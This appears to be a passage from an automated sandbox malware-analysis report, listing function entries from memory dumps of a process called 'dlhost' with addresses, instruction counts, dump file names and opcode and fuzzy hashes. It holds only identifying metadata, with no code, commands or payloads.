                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 47f4d1fad5592e954f1276d1eab6984ce961334548847a609c1d669c310a4a0e
                                                                • Instruction ID: a76e58328ae202e005b84a231a2de48f0817c80421c30fe703fc1aeb53df9ab3
                                                                • Opcode Fuzzy Hash: 47f4d1fad5592e954f1276d1eab6984ce961334548847a609c1d669c310a4a0e
                                                                • Instruction Fuzzy Hash: 4641E331B1E9591FE684B72CA86A2B9B7C1EF99355F0402BBE04DC3297DE189C428345
                                                                Function 00007FF848F30AFA Relevance: .2, Instructions: 162COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 83775cdc6dff7511cf10a4efd12359cd37e7be7cab14a3dcbce70eabffadcc9c
                                                                • Instruction ID: 3142c15aa238b3095710af3ce19a8b6cd004a153b0fae198e455af41de709a20
                                                                • Opcode Fuzzy Hash: 83775cdc6dff7511cf10a4efd12359cd37e7be7cab14a3dcbce70eabffadcc9c
                                                                • Instruction Fuzzy Hash: 2C51C131A1A61A9FE744BB68E455AED7BB1FF84394F40017AD008DB2C3DE2CA5468B94
                                                                Function 00007FF848F30638 Relevance: .1, Instructions: 138COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 87420b70805bea6cca8c661f852f312d5234c45e47deaa0fc5e9348385345d48
                                                                • Instruction ID: 2b87eaf53864bd7ec08b1e3382a1c0c74e1b3b25e1c70d8b71a8ffb0ec1a1682
                                                                • Opcode Fuzzy Hash: 87420b70805bea6cca8c661f852f312d5234c45e47deaa0fc5e9348385345d48
                                                                • Instruction Fuzzy Hash: A331A631B1D9491FE688EB2C9459279B7C2EB99755F1405BEE00EC32D7CE189C418345
                                                                Function 00007FF848F30C99 Relevance: .1, Instructions: 123COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a30f9874e7682e317185692f25f0758296b8bdde26c77056bbade3b6a3549b24
                                                                • Instruction ID: 58a8f7e2466805fbb95477b4cc8a38ef2288c1490c5bfb206dbb0ee7059e5dfa
                                                                • Opcode Fuzzy Hash: a30f9874e7682e317185692f25f0758296b8bdde26c77056bbade3b6a3549b24
                                                                • Instruction Fuzzy Hash: F431A021E2E9499FE784B7BC98593B966D2EF98690F0402BBE40DC32C3DE2C58014391
                                                                Function 00007FF848F31118 Relevance: .1, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 269e7e253b4326a453617fc240105362bdab3f96d895896adb72cb7b792ba4f4
                                                                • Instruction ID: 2d65f4a1eb4211be6d352da7af30ff805f7fdbaf041085e58f0cabe902b820ff
                                                                • Opcode Fuzzy Hash: 269e7e253b4326a453617fc240105362bdab3f96d895896adb72cb7b792ba4f4
                                                                • Instruction Fuzzy Hash: DE21652691F1A5AAE652B77874521F77BA0EF423BCF0842B7E4CC4E0D39E1C6449829D
                                                                Function 00007FF848F31F21 Relevance: .0, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d28b98ddec7b89ccc296126029781ace7b0887b0ff7c3377473149c908de7331
                                                                • Instruction ID: dec06f67396e372a7118c72181adfd1989ce01713613e2854b5da622c64b7bb1
                                                                • Opcode Fuzzy Hash: d28b98ddec7b89ccc296126029781ace7b0887b0ff7c3377473149c908de7331
                                                                • Instruction Fuzzy Hash: 5901267491DB950FE389B73858554367FF0DB91280F0805ABE888C71E7EE08AA858397
                                                                Function 00007FF848F315D9 Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 88b45f9d70f70bf1a62cffbebcd10f64ba84be323d4a6bf241499e6e3be085e1
                                                                • Instruction ID: 84083bbc31bc790e5698103de083fbbe528fe7901d34e2e1f1699c8ba9de4310
                                                                • Opcode Fuzzy Hash: 88b45f9d70f70bf1a62cffbebcd10f64ba84be323d4a6bf241499e6e3be085e1
                                                                • Instruction Fuzzy Hash: 9EF0EC32C0D6954FD366D7589C55172BFE0EB85250F0D45FBE08CC75A3D77859858341
                                                                Function 00007FF848F31198 Relevance: .0, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.2629717063.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff848f30000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 632ee3d4fbb4c386609e5cc5e6417265004b2ac56f901e5577047b6b78be29f0
                                                                • Instruction ID: 8badba75ebad8306da5660d1b2e9c6b8b4e2b72b44d3c733c6e8dd535ff9f322
                                                                • Opcode Fuzzy Hash: 632ee3d4fbb4c386609e5cc5e6417265004b2ac56f901e5577047b6b78be29f0
                                                                • Instruction Fuzzy Hash: DFE07D32C1D4168FE2A5B71C74511F277D0EF84298F080577F04CD31E2ED6D18864289

                                                                Executed Functions

                                                                Function 00007FF848F00DFE Relevance: .4, Instructions: 398COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.2730046765.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ff848f00000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7827d1467c6ba00f127ce13ec82e07a2f620fc91eabfd3ff473ac4e11134fd7b
                                                                • Instruction ID: da619acce75fe95343809edb0e2193f99abbf91bc50e9c2633321cffe6464e0c
                                                                • Opcode Fuzzy Hash: 7827d1467c6ba00f127ce13ec82e07a2f620fc91eabfd3ff473ac4e11134fd7b
                                                                • Instruction Fuzzy Hash: 87C1FB2291F5965EE351B77C78551EA3BA4EF86378B0842BBD4CCCF093DD0C684683A9
                                                                Function 00007FF848F01D5E Relevance: .2, Instructions: 204COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.2730046765.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ff848f00000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 47043fcbbf57eee18bd407f0af366faa1929ae7213ecb9730696d04de5eb73ef
                                                                • Instruction ID: 5a6d44bfda8b5aac76f824313996f57a4ba41f89109efdc806a14f01858fa3a7
                                                                • Opcode Fuzzy Hash: 47043fcbbf57eee18bd407f0af366faa1929ae7213ecb9730696d04de5eb73ef
                                                                • Instruction Fuzzy Hash: 1351C520A0E7C51FD38797B898692657FE2DF9B660B0901FFE089CB1A7C9494C4AC312
                                                                Function 00007FF848F011A0 Relevance: .7, Instructions: 653COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.2730046765.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ff848f00000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8595d55b520d99f0384bc4dbc1f4194919724954a92f95a11adcc71b65a65b4c
                                                                • Instruction ID: 12e1bc58bd17f7b4be4c4f176a08a46c3bf57d8d715d9738ab699163a79944aa
                                                                • Opcode Fuzzy Hash: 8595d55b520d99f0384bc4dbc1f4194919724954a92f95a11adcc71b65a65b4c
                                                                • Instruction Fuzzy Hash: 73123430A1D9099FE798FB6894597BA77E2FF88394F540579E00EC32C6EF2CA8418355
                                                                Function 00007FF848F01619 Relevance: .6, Instructions: 623COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.2730046765.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ff848f00000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c8ae208e5651f58804f28ca2ec73a627a6dd74449c2734f0048553006a2d6938
                                                                • Instruction ID: d0ca9d93c5ad8747e8b76494c5f0a958169b0c40714a8fb89da6a6608fed7827
                                                                • Opcode Fuzzy Hash: c8ae208e5651f58804f28ca2ec73a627a6dd74449c2734f0048553006a2d6938
                                                                • Instruction Fuzzy Hash: 47122430A1D9099FE798FB6894596BA77A2FF89394F440579E00EC32C6EF2CA8418355
                                                                Function 00007FF848F00432 Relevance: .3, Instructions: 348COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.2730046765.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ff848f00000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b58594ad58bd8fdcdc9654b8cad451b3d8041137cc87bf0e8f4233ffc69c1ab2
                                                                • Instruction ID: 4a8f72bb0b2754c3dac12bb3d0d3327989b78464d14dd288c11c15b4e5e0e086
                                                                • Opcode Fuzzy Hash: b58594ad58bd8fdcdc9654b8cad451b3d8041137cc87bf0e8f4233ffc69c1ab2
                                                                • Instruction Fuzzy Hash: 34813432B0E5556FE344BB6CB8551FA7B95EF85369F0802BBE04CCB183DE1C684687A4
                                                                Function 00007FF848F004D3 Relevance: .3, Instructions: 301COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.2730046765.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ff848f00000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ad7c365445ea0a34e05833bf4019eca737427eaa432c95e7445c3bcd55b0c613
                                                                • Instruction ID: 820f3fa59960f4bdae55562122615f6571f24f3fd2ec819a123354cc06f56468
                                                                • Opcode Fuzzy Hash: ad7c365445ea0a34e05833bf4019eca737427eaa432c95e7445c3bcd55b0c613
                                                                • Instruction Fuzzy Hash: 4D71F632B1E5156FE344FBACB8456EA77D5EFC8365B040277E04DC7183DE1C688686A4
                                                                Function 00007FF848F005D3 Relevance: .2, Instructions: 182COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.2730046765.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ff848f00000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3d91032020d0857d0da94df1da11608c8f92903349cc074c687d718f20e063f8
                                                                • Instruction ID: 5846fc4cd223dc1b48c4e9a76a632df5e2e77ec74f6f7488480eee301e404c0f
                                                                • Opcode Fuzzy Hash: 3d91032020d0857d0da94df1da11608c8f92903349cc074c687d718f20e063f8
                                                                • Instruction Fuzzy Hash: 8741E332B1D9091FE744BB6CA85A2B9B7C2EF992A1F1400BBE44DC3293DE186C468354
                                                                Function 00007FF848F005FA Relevance: .2, Instructions: 170COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.2730046765.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ff848f00000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6363191ca7dd9bfcc233c98113d179acd5967d87563e4b5af29304ad29ba98ff
                                                                • Instruction ID: b9d9c52172f0f3ae2ccbd25678f60da4c2531c9949d8aac8f7d099211bfe34fc
                                                                • Opcode Fuzzy Hash: 6363191ca7dd9bfcc233c98113d179acd5967d87563e4b5af29304ad29ba98ff
                                                                • Instruction Fuzzy Hash: 4A411531B1D9491FE784FB6CA86A2B9B7C2EF99355F0401BAE04DC32D3DE185C428355
                                                                Function 00007FF848F00AFB Relevance: .2, Instructions: 163COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.2730046765.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ff848f00000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 407ca74fcc3d17b3de2212da1374d26225ee06f81ad5827adc7a003a4213e45b
                                                                • Instruction ID: bd58423c73d66e49488dcde789e7cb0bb77515313397a12b519e842ab95a9c4b
                                                                • Opcode Fuzzy Hash: 407ca74fcc3d17b3de2212da1374d26225ee06f81ad5827adc7a003a4213e45b
                                                                • Instruction Fuzzy Hash: D251E135A1A51A9FE744FBA8D8256EE77B1FF85354F40013AD008CB2C7DF2C644687A8
                                                                Function 00007FF848F00638 Relevance: .1, Instructions: 138COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.2730046765.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ff848f00000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 421bfe57f0738afe5d3285e7f4d50419b0f4d1c1a83e3c232be03c95b3f961a8
                                                                • Instruction ID: cc675d8433f292c724b1e0626e8ae0526bb9bfa5ef90f62b33c2d3925db8ca3e
                                                                • Opcode Fuzzy Hash: 421bfe57f0738afe5d3285e7f4d50419b0f4d1c1a83e3c232be03c95b3f961a8
                                                                • Instruction Fuzzy Hash: A731F531B1D9491FE788EB2C986A379A7C2EF99751F0405BEE00EC32D7DE18AC418341
                                                                Function 00007FF848F00C99 Relevance: .1, Instructions: 123COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.2730046765.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ff848f00000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9439f15d6c9bedd11431c8f2df49be9aa82ae599197763d234a99a9f8791175e
                                                                • Instruction ID: 67ffca6d7a9fe0c0115ff3fb861c23608b9d2802181838c909f8525dd0136fa9
                                                                • Opcode Fuzzy Hash: 9439f15d6c9bedd11431c8f2df49be9aa82ae599197763d234a99a9f8791175e
                                                                • Instruction Fuzzy Hash: 1831E321F2E9499FE784B7BC98193BA66D2FF99754F04027AE40CC32C3EE2C58018352
                                                                Function 00007FF848F01F21 Relevance: .0, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.2730046765.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ff848f00000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3ef73b2410bd6c4dd14a59cc93f9330d20557f889d289040588caa75bd5fadd1
                                                                • Instruction ID: 5ece21b0f72293326d97dda4f162ecb17edb83b9faddf2dcf853aa1e8c9bc2c9
                                                                • Opcode Fuzzy Hash: 3ef73b2410bd6c4dd14a59cc93f9330d20557f889d289040588caa75bd5fadd1
                                                                • Instruction Fuzzy Hash: 7B014E74D0D7950FE355B73858654757FF0DB93681F0404AAE888C72D7FE08A98583A7
                                                                Function 00007FF848F01532 Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.2730046765.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ff848f00000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7489c39c469008098e7fb5eb9358c1d9a63d4a60d43a302d9cb119bfdcbdd1f4
                                                                • Instruction ID: 70192ba2caf53f50bec0ccb02f8c7589b4d90384e2cf37dc069c54a5d6cb490d
                                                                • Opcode Fuzzy Hash: 7489c39c469008098e7fb5eb9358c1d9a63d4a60d43a302d9cb119bfdcbdd1f4
                                                                • Instruction Fuzzy Hash: 49D05E31E2A41B4FE788FB5898651FFA6B1FF84280F800074D009D22C6DF3C29008258